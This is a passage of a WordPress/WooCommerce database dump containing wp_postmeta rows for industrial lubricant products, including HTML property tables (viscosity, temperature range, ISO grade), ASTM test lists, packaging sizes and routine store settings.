2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11471, 1010, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11472, 1010, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11473, 1010, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11474, 1010, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (11475, 1010, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11476, 1010, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11477, 1010, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (11478, 1010, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11479, 1010, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (11480, 1010, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (11481, 1010, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (11482, 1010, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (11483, 1010, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11484, 1010, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11485, 1010, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11486, 1010, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (11487, 1010, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (11488, 1010, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11489, 1010, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (11490, 1010, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11491, 1010, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11492, 1010, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (11493, 1010, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11494, 1010, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11495, 1010, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (11496, 1010, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11497, 1010, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11498, 1010, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (11499, 1010, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (11500, 1010, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (11529, 1010, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (11530, 1010, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (11531, 1011, '_edit_lock', '1474296748:2'); 
INSERT INTO `wp_postmeta` VALUES (11532, 1011, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (11533, 1011, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (11534, 1011, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (11535, 1011, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11536, 1011, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11537, 1011, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11538, 1011, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11539, 1011, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (11540, 1011, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11541, 1011, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11542, 1011, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (11543, 1011, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11544, 1011, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (11545, 1011, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (11546, 1011, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (11547, 1011, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (11548, 1011, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11549, 1011, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11550, 1011, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11551, 1011, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (11552, 1011, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (11553, 1011, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11554, 1011, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (11555, 1011, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11556, 1011, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11557, 1011, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (11558, 1011, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11559, 1011, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11560, 1011, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (11561, 1011, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11562, 1011, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11563, 1011, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (11564, 1011, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (11565, 1011, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (11594, 1011, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (11595, 1011, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (11596, 1012, '_edit_lock', '1475863284:2'); 
INSERT INTO `wp_postmeta` VALUES (11597, 1012, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (11598, 1012, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (11599, 1012, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (11600, 1012, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11601, 1012, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11602, 1012, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (11603, 1012, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (11604, 1012, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (11605, 1012, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11606, 1012, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11607, 1012, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (11608, 1012, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11609, 1012, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (11610, 1012, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (11611, 1012, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (11612, 1012, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (11613, 1012, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11614, 1012, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11615, 1012, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11616, 1012, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (11617, 1012, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (11618, 1012, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11619, 1012, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (11620, 1012, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11621, 1012, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11622, 1012, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (11623, 1012, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11624, 1012, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11625, 1012, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (11626, 1012, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11627, 1012, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11628, 1012, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (11629, 1012, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (11630, 1012, '_product_image_gallery', '378,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (11659, 1012, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (11660, 1012, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (11661, 1014, '_edit_lock', '1475860633:2'); 
INSERT INTO `wp_postmeta` VALUES (11662, 1014, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (11663, 1014, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (11664, 1014, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (11665, 1014, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: 